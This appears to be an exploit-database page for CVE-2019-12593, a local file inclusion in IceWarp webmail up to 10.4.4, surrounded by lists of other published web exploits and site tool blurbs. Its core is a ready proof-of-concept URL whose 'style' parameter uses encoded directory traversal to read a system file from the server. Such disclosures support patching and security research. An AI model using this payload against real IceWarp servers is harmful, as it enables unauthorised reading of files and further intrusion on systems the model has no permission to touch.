"IceWarp 10.4.4 - Local File Inclusion"

Author

Exploit author

JameelNabbo

Platform

Exploit platform

php

Release date

Exploit published date

2019-06-04

Download file

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

Release Date	Title	Type	Platform	Author
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"
2020-05-27	"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"OXID eShop 6.3.4 - 'sorting' SQL Injection"	webapps	php	VulnSpy

Release Date	Title	Type	Platform	Author
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"OXID eShop 6.3.4 - 'sorting' SQL Injection"	webapps	php	VulnSpy
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"
2020-05-27	"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-26	"OpenEMR 5.0.1 - Remote Code Execution"	webapps	php	"Musyoka Ian"

Release Date	Title	Type	Platform	Author
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-05-27	"Deltek Maconomy 2.2.5 - Local File Inclusion"	webapps	multiple	JameelNabbo
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-03-04	"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"	webapps	hardware	JameelNabbo
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2018-02-16	"Twig < 2.4.4 - Server Side Template Injection"	webapps	php	JameelNabbo

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46959/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"IceWarp 10.4.4 - Local File Inclusion"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.